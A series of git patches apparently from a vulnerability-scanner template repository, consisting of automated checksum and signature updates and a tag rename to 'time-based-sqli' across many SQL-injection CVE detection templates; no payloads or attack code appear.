+78,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and - -# digest: 490a0046304402201bebf15e1b69288326f9a85cfe2771f6d3498cdb90407f7773c40e20268c02cc022069d21d9e18641e149ee2171c9bc5684a81d2412b2c00fdd693486af07aee113d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022033ef9b3e74fc7c32bd85874ea3ea3e73c2ee3a6e528bde69b2df12427e729063022100ce09ff3714dbd35320db650ebeda56efc1d2fa37dd7983704be303b3f52df62a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1317.yaml b/http/cves/2023/CVE-2023-1317.yaml index 6d86cee1f2..c1975be46e 100644 --- a/http/cves/2023/CVE-2023-1317.yaml +++ b/http/cves/2023/CVE-2023-1317.yaml @@ -72,3 +72,5 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and + +# digest: 4a0a0047304502200da1b8238b5b908294deb01f04c358eb3adcdebb3b79077a135e6f5786f446570221009241c6a11c539b33a55a0f2d9244319a69039d22c5e94b114be1073307cb7f84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c12c745c6e9186473955cc9fcf3721a4c5be14cb Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:34:58 +0000 Subject: [PATCH 139/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d565d7f62d..93e88d393a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -418,8 +418,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:0c172bdd6d48baf337487174e0da4f0f10277730 -cves.json-checksum.txt:f5aa03e3ec3ecd58d192edad5ede7b503006d020 +cves.json:ac0be37fc096aacc70b5e2ec849ce2fec2116012 +cves.json-checksum.txt:75f3f2af5cec95748091a741f2dca33966fca843 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -1851,7 +1851,7 @@ http/cves/2018/CVE-2018-6605.yaml:4c52ab31c5528441d5cdb88b6da9eee6ee7197e0 http/cves/2018/CVE-2018-6910.yaml:1662c242773d5c5b17b063fd3f30a958c575b8bd http/cves/2018/CVE-2018-7192.yaml:a1e40dfc4020146019c1badc2740c05c247e4ef9 http/cves/2018/CVE-2018-7193.yaml:fd7af1eb0aa46d5a40e0ed0cad16cb8094b756ec -http/cves/2018/CVE-2018-7196.yaml:7e973067fa5bdf26ec1aa5c4727c98d212fdb7b7 +http/cves/2018/CVE-2018-7196.yaml:8393faa790aa1a994410bb3f0c499342357bb68c http/cves/2018/CVE-2018-7251.yaml:35bdb470f05dec3b89486bd31a38d23be7d85346 http/cves/2018/CVE-2018-7282.yaml:be0c74b3dbba955d79d30c81b2fdc9e89502a91b http/cves/2018/CVE-2018-7314.yaml:dfed8b8206e6720d6d51363adc96f9ba89368e76 @@ -2725,7 +2725,7 @@ http/cves/2021/CVE-2021-45380.yaml:f24398df04fa60b12219061f6d11cc69fa9f6df6 http/cves/2021/CVE-2021-45382.yaml:cb0aa02a98b1cdfda90a720aed418fb486944046 http/cves/2021/CVE-2021-45422.yaml:2cf95513dc085cd08d0a9217c72c63192320ade9 http/cves/2021/CVE-2021-45428.yaml:14d98248ac661705a256a679f0eb6e1e48233c2b -http/cves/2021/CVE-2021-45811.yaml:c1e01707da693fece6881bcc85259cdcc5263bf4 +http/cves/2021/CVE-2021-45811.yaml:3c08df59634f29fcfbf65b1ca7670a7bff58a735 http/cves/2021/CVE-2021-45967.yaml:1c060977d1fab68ce71716addc499b6eaea77589 http/cves/2021/CVE-2021-45968.yaml:921c33e7aeeb0b0ce6f57a9e457d202de0285cd8 http/cves/2021/CVE-2021-46005.yaml:3b3b7ae4a988dd406432da64978b8a385a76f20d @@ -3245,8 +3245,8 @@ http/cves/2023/CVE-2023-1020.yaml:62fc61d24e0e1681b1bf64d37033caecf096364a http/cves/2023/CVE-2023-1080.yaml:57fd2d5ede5e09e53ef5c560add050d334ba9b09 http/cves/2023/CVE-2023-1177.yaml:ab4b55e867e4a8f730b51207ffea03e8053bf1d1 http/cves/2023/CVE-2023-1263.yaml:954755ea23eaab8dbf35c5b53d78ae5642ac7c11 -http/cves/2023/CVE-2023-1315.yaml:a53ea34f6981643216909cf0f2c3ce39b237e608 -http/cves/2023/CVE-2023-1317.yaml:eea86a0c023e1fdfd5e5d7ef2a6a800284012074 +http/cves/2023/CVE-2023-1315.yaml:2178e336e062101eb8b803c9d4623a65d90ac012 +http/cves/2023/CVE-2023-1317.yaml:593e1fcb9cc046a13cebccb50131238ae296e3d9 http/cves/2023/CVE-2023-1318.yaml:0d0831a4d460eb10cf00c23d73899fc2be19f222 http/cves/2023/CVE-2023-1362.yaml:6e432a7601e15e3e50f24c19ef101f6395404113 http/cves/2023/CVE-2023-1408.yaml:2c3e73f4296c1f9606b8e377436ebdbfe1f715e2 @@ -9482,7 +9482,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:82cfbf7a9c71ce5bcfcc21cf5e6d9f591c681a8c +templates-checksum.txt:8bfe68aebe2156b61a85c01329fd11931449be3d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4de035c6c930a9f203969219a023dac86979bbcf Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:36:22 +0000 Subject: [PATCH 140/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- http/cves/2018/CVE-2018-7192.yaml | 2 ++ http/cves/2018/CVE-2018-7193.yaml | 2 ++ http/cves/2018/CVE-2018-7196.yaml | 3 +-- http/cves/2023/CVE-2023-1317.yaml | 3 +-- http/cves/2023/CVE-2023-1318.yaml | 2 ++ 5 files changed, 8 insertions(+), 4 deletions(-) diff --git a/http/cves/2018/CVE-2018-7192.yaml b/http/cves/2018/CVE-2018-7192.yaml index 786df9b723..af8ae31fcf 100644 --- a/http/cves/2018/CVE-2018-7192.yaml +++ b/http/cves/2018/CVE-2018-7192.yaml @@ -72,3 +72,5 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and + +# digest: 4a0a00473045022100ba3aa3f4e0706097823ef907be4150e829364bef1658b1b0d5d62e175c417b8002203730cb20901cf3edd8e75375f623df02b065651a4c40b20d38d1ce40832dc67e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7193.yaml b/http/cves/2018/CVE-2018-7193.yaml index 86291ae827..38c48a90e9 100644 --- a/http/cves/2018/CVE-2018-7193.yaml +++ b/http/cves/2018/CVE-2018-7193.yaml @@ -72,3 +72,5 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and + +# digest: 490a0046304402202de9db56da192cac0445aff761771d11b4a5f8fa2bddaa4bf787e6a845c0910502200688dcd768baced7323f738ef3bfa984bedc1550e0be285790188fedb6a822ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7196.yaml b/http/cves/2018/CVE-2018-7196.yaml index 1e44b72ef6..3ca96ae6d8 100644 --- a/http/cves/2018/CVE-2018-7196.yaml +++ b/http/cves/2018/CVE-2018-7196.yaml @@ -70,5 +70,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and - -# digest: 4b0a00483046022100eca5508a6c0d079c15b0a6b9372c91991910ad34d6dfb7de196eeb8afffc6804022100ffbad15a4a2520a5a3fb30d19ab23ba1d2e98bec7e0577224e500e5638740e5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202a3bfee629128ded92342fc0366e48e742ede36203e4d9989eb86598ea466e1502200b83765e3c103aa1bb774995dbad2ffcd07ab46b6a05c27e26c939dd4f48a023:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1317.yaml b/http/cves/2023/CVE-2023-1317.yaml index c1975be46e..90f1fa39bd 100644 --- a/http/cves/2023/CVE-2023-1317.yaml +++ b/http/cves/2023/CVE-2023-1317.yaml @@ -72,5 +72,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and - -# digest: 4a0a0047304502200da1b8238b5b908294deb01f04c358eb3adcdebb3b79077a135e6f5786f446570221009241c6a11c539b33a55a0f2d9244319a69039d22c5e94b114be1073307cb7f84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204f90509b43c6ab32f6245897168bacb72fe35e4e8194123cdffa557cac198879022100e38c5c169b786f0b9c63fbe1bb533a75f9a69a78a82ff9cf33a52825eda0daa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1318.yaml b/http/cves/2023/CVE-2023-1318.yaml index a7b0c1a500..ebf6cabe01 100644 --- a/http/cves/2023/CVE-2023-1318.yaml +++ b/http/cves/2023/CVE-2023-1318.yaml @@ -81,3 +81,5 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and + +# digest: 4b0a0048304602210098728f63a0d4a44dbbf9c481c4f96488f4e31c67061eead68abf2265659bc656022100e064e98e4429b080939f0b40b6017bc6b45c0cc6b1d0c3b81bfdaf0d5c93ea5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 31de443bd6b77a146c8c1c6f156e8b40dddce887 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Tue, 15 Oct 2024 17:27:37 +0700 Subject: [PATCH 141/218] updated to time-based-sqli --- dast/vulnerabilities/sqli/time-based-sqli.yaml | 2 +- http/cves/2015/CVE-2015-2196.yaml | 2 +- http/cves/2015/CVE-2015-4062.yaml | 2 +- http/cves/2015/CVE-2015-9323.yaml | 2 +- http/cves/2018/CVE-2018-16159.yaml | 2 +- http/cves/2018/CVE-2018-7282.yaml | 2 +- http/cves/2019/CVE-2019-7139.yaml | 2 +- http/cves/2020/CVE-2020-11530.yaml | 2 +- http/cves/2020/CVE-2020-17463.yaml | 2 +- http/cves/2020/CVE-2020-26248.yaml | 2 +- http/cves/2020/CVE-2020-27481.yaml | 2 +- http/cves/2021/CVE-2021-24340.yaml | 2 +- http/cves/2021/CVE-2021-24442.yaml | 2 +- http/cves/2021/CVE-2021-24554.yaml | 2 +- http/cves/2021/CVE-2021-24731.yaml | 2 +- http/cves/2021/CVE-2021-24762.yaml | 2 +- http/cves/2021/CVE-2021-24791.yaml | 2 +- http/cves/2021/CVE-2021-24827.yaml | 2 +- http/cves/2021/CVE-2021-24849.yaml | 2 +- http/cves/2021/CVE-2021-24862.yaml | 2 +- http/cves/2021/CVE-2021-24931.yaml | 2 +- http/cves/2021/CVE-2021-24943.yaml | 2 +- http/cves/2021/CVE-2021-24946.yaml | 2 +- http/cves/2021/CVE-2021-25114.yaml | 2 +- http/cves/2021/CVE-2021-25899.yaml | 2 +- http/cves/2021/CVE-2021-27314.yaml | 2 +- http/cves/2021/CVE-2021-27315.yaml | 2 +- http/cves/2021/CVE-2021-27316.yaml | 2 +- http/cves/2021/CVE-2021-27319.yaml | 2 +- http/cves/2021/CVE-2021-27320.yaml | 2 +- http/cves/2021/CVE-2021-3110.yaml | 2 +- http/cves/2021/CVE-2021-39165.yaml | 2 +- http/cves/2022/CVE-2022-0228.yaml | 2 +- http/cves/2022/CVE-2022-0349.yaml | 2 +- http/cves/2022/CVE-2022-0412.yaml | 2 +- http/cves/2022/CVE-2022-0651.yaml | 2 +- http/cves/2022/CVE-2022-0658.yaml | 2 +- http/cves/2022/CVE-2022-0693.yaml | 2 +- http/cves/2022/CVE-2022-0747.yaml | 2 +- http/cves/2022/CVE-2022-0760.yaml | 2 +- http/cves/2022/CVE-2022-0769.yaml | 2 +- http/cves/2022/CVE-2022-0773.yaml | 2 +- http/cves/2022/CVE-2022-0784.yaml | 2 +- http/cves/2022/CVE-2022-0785.yaml | 2 +- http/cves/2022/CVE-2022-0786.yaml | 2 +- http/cves/2022/CVE-2022-0787.yaml | 2 +- http/cves/2022/CVE-2022-0788.yaml | 2 +- http/cves/2022/CVE-2022-0826.yaml | 2 +- http/cves/2022/CVE-2022-0827.yaml | 2 +- http/cves/2022/CVE-2022-0846.yaml | 2 +- http/cves/2022/CVE-2022-0867.yaml | 2 +- http/cves/2022/CVE-2022-0948.yaml | 2 +- http/cves/2022/CVE-2022-0949.yaml | 2 +- http/cves/2022/CVE-2022-1013.yaml | 2 +- http/cves/2022/CVE-2022-1057.yaml | 2 +- http/cves/2022/CVE-2022-1768.yaml | 2 +- http/cves/2022/CVE-2022-1883.yaml | 2 +- http/cves/2022/CVE-2022-22897.yaml | 2 +- http/cves/2022/CVE-2022-24223.yaml | 2 +- http/cves/2022/CVE-2022-24265.yaml | 2 +- http/cves/2022/CVE-2022-24266.yaml | 2 +- http/cves/2022/CVE-2022-2467.yaml | 2 +- http/cves/2022/CVE-2022-25148.yaml | 2 +- http/cves/2022/CVE-2022-25149.yaml | 2 +- http/cves/2022/CVE-2022-27984.yaml | 2 +- http/cves/2022/CVE-2022-28032.yaml | 2 +- http/cves/2022/CVE-2022-3142.yaml | 2 +- http/cves/2022/CVE-2022-31499.yaml | 2 +- http/cves/2022/CVE-2022-31976.yaml | 2 +- http/cves/2022/CVE-2022-31977.yaml | 2 +- http/cves/2022/CVE-2022-31978.yaml | 2 +- http/cves/2022/CVE-2022-33965.yaml | 2 +- http/cves/2022/CVE-2022-3768.yaml | 2 +- http/cves/2022/CVE-2022-3800.yaml | 2 +- http/cves/2022/CVE-2022-40032.yaml | 2 +- http/cves/2022/CVE-2022-4049.yaml | 2 +- http/cves/2022/CVE-2022-4050.yaml | 2 +- http/cves/2022/CVE-2022-4059.yaml | 2 +- http/cves/2022/CVE-2022-4117.yaml | 2 +- http/cves/2022/CVE-2022-44290.yaml | 2 +- http/cves/2022/CVE-2022-44291.yaml | 2 +- http/cves/2022/CVE-2022-45805.yaml | 2 +- http/cves/2023/CVE-2023-0261.yaml | 2 +- http/cves/2023/CVE-2023-0600.yaml | 2 +- http/cves/2023/CVE-2023-0630.yaml | 2 +- http/cves/2023/CVE-2023-0900.yaml | 2 +- http/cves/2023/CVE-2023-1408.yaml | 2 +- http/cves/2023/CVE-2023-1730.yaml | 2 +- http/cves/2023/CVE-2023-2130.yaml | 2 +- http/cves/2023/CVE-2023-23488.yaml | 2 +- http/cves/2023/CVE-2023-23489.yaml | 2 +- http/cves/2023/CVE-2023-27032.yaml | 2 +- http/cves/2023/CVE-2023-27034.yaml | 2 +- http/cves/2023/CVE-2023-27847.yaml | 2 +- http/cves/2023/CVE-2023-28662.yaml | 2 +- http/cves/2023/CVE-2023-30150.yaml | 2 +- http/cves/2023/CVE-2023-3077.yaml | 2 +- http/cves/2023/CVE-2023-34751.yaml | 2 +- http/cves/2023/CVE-2023-34752.yaml | 2 +- http/cves/2023/CVE-2023-34753.yaml | 2 +- http/cves/2023/CVE-2023-34754.yaml | 2 +- http/cves/2023/CVE-2023-34755.yaml | 2 +- http/cves/2023/CVE-2023-34756.yaml | 2 +- http/cves/2023/CVE-2023-36284.yaml | 2 +- http/cves/2023/CVE-2023-39361.yaml | 2 +- http/cves/2023/CVE-2023-39650.yaml | 2 +- http/cves/2023/CVE-2023-39796.yaml | 2 +- http/cves/2023/CVE-2023-43374.yaml | 2 +- http/cves/2023/CVE-2023-45375.yaml | 2 +- http/cves/2023/CVE-2023-46347.yaml | 2 +- http/cves/2023/CVE-2023-48084.yaml | 2 +- http/cves/2023/CVE-2023-4974.yaml | 2 +- http/cves/2023/CVE-2023-6063.yaml | 2 +- http/cves/2023/CVE-2023-6567.yaml | 2 +- http/cves/2024/CVE-2024-1061.yaml | 2 +- http/cves/2024/CVE-2024-1071.yaml | 2 +- http/cves/2024/CVE-2024-1512.yaml | 2 +- http/cves/2024/CVE-2024-1698.yaml | 2 +- http/cves/2024/CVE-2024-2621.yaml | 2 +- http/cves/2024/CVE-2024-27956.yaml | 2 +- http/cves/2024/CVE-2024-2876.yaml | 2 +- http/cves/2024/CVE-2024-2879.yaml | 2 +- http/cves/2024/CVE-2024-3552.yaml | 2 +- http/cves/2024/CVE-2024-36412.yaml | 2 +- http/cves/2024/CVE-2024-36683.yaml | 2 +- http/cves/2024/CVE-2024-3922.yaml | 2 +- http/cves/2024/CVE-2024-4257.yaml | 2 +- http/cves/2024/CVE-2024-4295.yaml | 2 +- http/cves/2024/CVE-2024-43917.yaml | 2 +- http/cves/2024/CVE-2024-4443.yaml | 2 +- http/cves/2024/CVE-2024-5765.yaml | 2 +- http/cves/2024/CVE-2024-5975.yaml | 2 +- http/cves/2024/CVE-2024-6028.yaml | 2 +- http/cves/2024/CVE-2024-6159.yaml | 2 +- http/cves/2024/CVE-2024-6205.yaml | 2 +- http/cves/2024/CVE-2024-6924.yaml | 2 +- http/cves/2024/CVE-2024-6926.yaml | 2 +- http/cves/2024/CVE-2024-6928.yaml | 2 +- http/cves/2024/CVE-2024-7188.yaml | 2 +- http/cves/2024/CVE-2024-7854.yaml | 2 +- http/cves/2024/CVE-2024-8484.yaml | 2 +- http/cves/2024/CVE-2024-8503.yaml | 2 +- http/cves/2024/CVE-2024-8522.yaml | 2 +- http/cves/2024/CVE-2024-9465.yaml | 2 +- http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml | 2 +- http/vulnerabilities/other/applezeed-sqli.yaml | 2 +- http/vulnerabilities/other/azon-dominator-sqli.yaml | 2 +- http/vulnerabilities/other/csz-cms-sqli.yaml | 2 +- http/vulnerabilities/other/ecology-oa-file-sqli.yaml | 2 +- http/vulnerabilities/other/fumengyun-sqli.yaml | 2 +- http/vulnerabilities/other/groomify-sqli.yaml | 2 +- http/vulnerabilities/other/opencart-core-sqli.yaml | 2 +- http/vulnerabilities/other/pingsheng-electronic-sqli.yaml | 2 +- http/vulnerabilities/other/pmb-sqli.yaml | 2 +- http/vulnerabilities/other/readymade-unilevel-sqli.yaml | 2 +- http/vulnerabilities/other/sitemap-sql-injection.yaml | 2 +- http/vulnerabilities/other/stackposts-sqli.yaml | 2 +- .../prestashop/prestashop-apmarketplace-sqli.yaml | 2 +- http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml | 2 +- http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml | 2 +- .../wordpress/advanced-booking-calendar-sqli.yaml | 2 +- http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml | 2 +- http/vulnerabilities/wordpress/notificationx-sqli.yaml | 2 +- http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml | 2 +- .../vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml | 2 +- http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml | 2 +- http/vulnerabilities/wordpress/wp-statistics-sqli.yaml | 2 +- http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml | 2 +- http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml | 2 +- http/vulnerabilities/yonyou/yonyou-ufida-nc-cloud-sqli.yaml | 2 +- 170 files changed, 170 insertions(+), 170 deletions(-) diff --git a/dast/vulnerabilities/sqli/time-based-sqli.yaml b/dast/vulnerabilities/sqli/time-based-sqli.yaml index e659b7f2d9..77b16407b8 100644 --- a/dast/vulnerabilities/sqli/time-based-sqli.yaml +++ b/dast/vulnerabilities/sqli/time-based-sqli.yaml @@ -6,7 +6,7 @@ info: severity: critical description: | This Template detects time-based Blind SQL Injection vulnerability - tags: time-based,sqli,dast,time-based,blind + tags: time-based-sqli,sqli,dast,time-based-sqli,blind flow: http(1) && http(2) diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 20bae87ce5..ed7c850053 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -28,7 +28,7 @@ info: vendor: web-dorado product: spider_calendar framework: wordpress - tags: time-based,cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado + tags: time-based-sqli,cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado http: - raw: diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 2ff30e4f32..9d794d0b98 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -30,7 +30,7 @@ info: vendor: newstatpress_project product: newstatpress framework: wordpress - tags: time-based,cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project + tags: time-based-sqli,cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project http: - raw: diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index 17c3be3d27..6270ea9bf4 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -29,7 +29,7 @@ info: vendor: duckdev product: 404_to_301 framework: wordpress - tags: time-based,cve2015,cve,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated,duckdev + tags: time-based-sqli,cve2015,cve,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated,duckdev http: - raw: diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index e45a3367df..91c8fc1502 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -31,7 +31,7 @@ info: framework: wordpress shodan-query: http.html:"/wp-content/plugins/gift-voucher/" fofa-query: body="/wp-content/plugins/gift-voucher/" - tags: time-based,cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen + tags: time-based-sqli,cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen http: - raw: diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index 7a0be7e458..575f49f6fc 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -31,7 +31,7 @@ info: fofa-query: title="printmonitor" google-query: intitle:"printmonitor" product": printmonitor - tags: time-based,cve2018,cve,sqli,printmonitor,unauth,titool + tags: time-based-sqli,cve2018,cve,sqli,printmonitor,unauth,titool variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2019/CVE-2019-7139.yaml b/http/cves/2019/CVE-2019-7139.yaml index 83ee6bc127..8bef5ba5c9 100644 --- a/http/cves/2019/CVE-2019-7139.yaml +++ b/http/cves/2019/CVE-2019-7139.yaml @@ -32,7 +32,7 @@ info: - http.component:"Magento" - cpe:"cpe:2.3:a:magento:magento" - http.component:"magento" - tags: time-based,cve,cve2019,sqli,magento + tags: time-based-sqli,cve,cve2019,sqli,magento flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index 49e61d4230..0bfa32caff 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml @@ -30,7 +30,7 @@ info: vendor: idangero product: chop_slider framework: wordpress - tags: time-based,cve,cve2020,wpscan,seclists,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero + tags: time-based-sqli,cve,cve2020,wpscan,seclists,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero http: - raw: diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index 84344bbe03..8a1ac8b7f0 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.title:"fuel cms" fofa-query: title="fuel cms" google-query: intitle:"fuel cms" - tags: time-based,cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio + tags: time-based-sqli,cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio http: - raw: diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml index 3d08387878..7400462488 100644 --- a/http/cves/2020/CVE-2020-26248.yaml +++ b/http/cves/2020/CVE-2020-26248.yaml @@ -29,7 +29,7 @@ info: vendor: prestashop product: productcomments framework: prestashop - tags: time-based,cve,cve2020,packetstorm,sqli,prestshop,prestashop + tags: time-based-sqli,cve,cve2020,packetstorm,sqli,prestshop,prestashop http: - raw: diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index 43c0ae2c7f..9552ef2aa3 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -27,7 +27,7 @@ info: vendor: goodlayers product: good_learning_management_system framework: wordpress - tags: time-based,cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress + tags: time-based-sqli,cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress http: - raw: diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index f1df9c40a3..089c11ab29 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -30,7 +30,7 @@ info: fofa-query: body=/wp-content/plugins/wp-statistics/ publicwww-query: /wp-content/plugins/wp-statistics/ google-query: inurl:/wp-content/plugins/wp-statistics - tags: time-based,cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs + tags: time-based-sqli,cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs http: - raw: diff --git a/http/cves/2021/CVE-2021-24442.yaml b/http/cves/2021/CVE-2021-24442.yaml index ab9b394ac2..841b736b80 100644 --- a/http/cves/2021/CVE-2021-24442.yaml +++ b/http/cves/2021/CVE-2021-24442.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/polls-widget/ fofa-query: body=/wp-content/plugins/polls-widget/ publicwww-query: "/wp-content/plugins/polls-widget/" - tags: time-based,wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart + tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart http: - raw: diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index b805ade23f..3d3cbc0d03 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -30,7 +30,7 @@ info: vendor: freelancetoindia product: paytm-pay framework: wordpress - tags: time-based,cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia + tags: time-based-sqli,cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia http: - raw: diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index ca38b8ab64..6ef9fa9248 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -27,7 +27,7 @@ info: vendor: genetechsolutions product: pie_register framework: wordpress - tags: time-based,cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth,genetechsolutions + tags: time-based-sqli,cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth,genetechsolutions http: - raw: diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml index a71caf93c7..c1dfcdada3 100644 --- a/http/cves/2021/CVE-2021-24762.yaml +++ b/http/cves/2021/CVE-2021-24762.yaml @@ -28,7 +28,7 @@ info: vendor: getperfectsurvey product: perfect_survey framework: wordpress - tags: time-based,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey + tags: time-based-sqli,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey http: - raw: diff --git a/http/cves/2021/CVE-2021-24791.yaml b/http/cves/2021/CVE-2021-24791.yaml index 1f08bbcc55..b761dd7eea 100644 --- a/http/cves/2021/CVE-2021-24791.yaml 